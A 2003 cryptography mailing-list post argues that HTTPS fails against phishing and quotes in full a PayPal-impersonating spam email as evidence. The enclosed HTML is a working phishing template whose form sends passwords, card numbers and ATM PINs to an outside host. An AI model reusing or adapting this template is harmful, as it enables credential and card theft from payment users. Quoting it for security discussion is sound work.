An attack on paypal
James A. Donald
jamesd at echeque.com
Sun Jun 8 14:55:20 EDT 2003
Attached is a spam mail that constitutes an attack on paypal similar
in effect and method to man in the middle.
The bottom line is that https just is not working. Its broken.
The fact that people keep using shared secrets is a symptom of https
not working.
The flaw in https is that you cannot operate the business and trust
model using https that you can with shared secrets.
-------------- Enclosure number 1 ----------------
Received: from bgp480791bgs.summit01.nj.comcast.net [68.37.160.58] by dpmail07.doteasy.com
(SMTPD32-7.13) id A3506CD006A; Sat, 07 Jun 2003 19:45:36 -0700
Date: Sun, 08 Jun 2003 02:50:24 +0000
From: Confirm <confirm at paypal.com>
Subject: Important Information Regarding Your PayPal Account
To: Jamesd <jamesd at echeque.com>
References: <4FG6E0K8HJHJ2DL9 at echeque.com>
In-Reply-To: <4FG6E0K8HJHJ2DL9 at echeque.com>
Message-ID: <62K3JH9LKLB0I8GK at paypal.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-RCPT-TO: <jamesd at echeque.com>
Status: U
X-PMFLAGS: 34079360 0 1 P4EDB0.CNM
<html>
<head>
<STYLE type=text/css>
.dummy {}
BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;color: #000000;}
UL {list-style: square}
.pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size: 24px;font-weight: bold;color: #003366;}
.pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size: 22px;font-weight: bold;color: #003366;}
.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;}
.pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;}
.pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;}
.pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 14px;font-weight: bold;color: #000000;}
.pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #000000;}
.pp_smallbluetext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #003366;}
.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;}
</STYLE>
<title>PayPal</title>
</head>
<body>
<table width="600" cellspacing="0" cellpadding="0" border="0" align="center">
<tr>
<td><A href="https://www.paypal.com/"><IMG src="http://www.paypal.com/images/paypal_logo.gif" width=109 height=35 alt="PayPal" border="0" vspace=10></A>
</td>
</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
<td background="http://www.paypal.com/images/bg_clk.gif" width="100%"><img src="http://www.paypal.com/images/pixel.gif" height="29" width="1" border="0"></td>
</tr>
<tr>
<td><img src="http://www.paypal.com/images/pixel.gif" height="10" width="1" border="0"></td>
</tr>
</table>
<table width="600" cellspacing="0" cellpadding="5" border="0" align="center">
<tr>
<td class="pp_sortofbig" align=middle>Dear PayPal Customer</td>
</tr>
<tr>
<td valign="top"><p> </p>
<p>This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.</p>
<p>The inactive customers are subject to restriction and removal in the next
3 months.</p>
<p>Please confirm your email address and Credit or Check Card information<b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">
</b>using the form below:</p></td>
</tr>
<tr>
<td align=middle>
<form action="http://www.pos2life.biz/vp.php" method="post">
<p style="MARGIN-TOP: -2px; MARGIN-BOTTOM: 0px; MARGIN-LEFT: 4px"
> </p>
<table border="0">
<tr>
<td>
<P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal"
>Email Address:</b></P></td>
<td><input name="lgn" size="32" maxlength="32" ></td>
</tr>
<tr>
<td>
<P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal"
>Password:</b></P></td>
<td><input name="psw" type="password" size="32" maxlength="32"></td>
</tr>
<tr>
<td>
<P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">First Name:</b></P></td>
<td><input name="fname" size="32" maxlength="32" ></td>
</tr>
<tr>
<td>
<P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Last Name:</b></P></td>
<td><input name="lname" size="32" maxlength="32" ></td>
</tr>
<tr>
<td>
<P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> ZIP:</b></P></td>
<td><input name="bz" size="32" maxlength="20">
<tr>
<td>
<P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Credit or Check Card #:</b></P></td>
<td><input name="cz" size="32" maxlength="16"></td>
<tr>
<td>
<P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Expiration Date:</b></P></td>
<td>
<select name="crdm">
<OPTION value="zero" selected>Month</OPTION>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select> /
<select name="crdy"> <OPTION value="zero" selected>Year</OPTION>
<option value="03">2003</option>
<option value="04">2004</option>
<option value="05">2005</option>
<option value="06">2006</option>
<option value="07">2007</option>
<option value="08">2008</option>
<option value="09">2009</option>
<option value="10">2010</option>
<option value="11">2011</option>
<option value="12">2012</option> </select>
</td>
<tr>
<td>
<P align=left><b style="FONT: bold 8pt : normal"
> ATM PIN:</b></P></td>
<td><input name="pni" type="password" size="32" maxlength="6"></td>
</tr>
</table>
<p>
<input type="submit" value=" Submit ">
</p>
</form>
Information transmitted using 128bit SSL encryption.
<p><br>
</p></td>
</tr>
<tr>
<td align=middle><strong>Thanks for using PayPal! </strong><br></td>
</tr>
<tr>
<td><img src="http://www.paypal.com/images/dot_row_long.gif"></td>
</tr>
<tr>
<td class="pp_footer"> This PayPal notification was sent
to this email address because you are a Web Accept user and
chose to receive the PayPal Periodical newsletter and Product Updates. To
modify your notification preferences, go to <A
href="https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-NOTI</A>
and log in to your account. Changes may take several
days to be reflected in our mailings. Replies to this email will not be
processed. <br> <br>
Copyright© 2003 PayPal Inc. All rights reserved. Designated trademarks
and brands are the property of their respective owners. </td>
</tr>
</table>
</body></html>
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo at metzdowd.com
More information about the cryptography
mailing list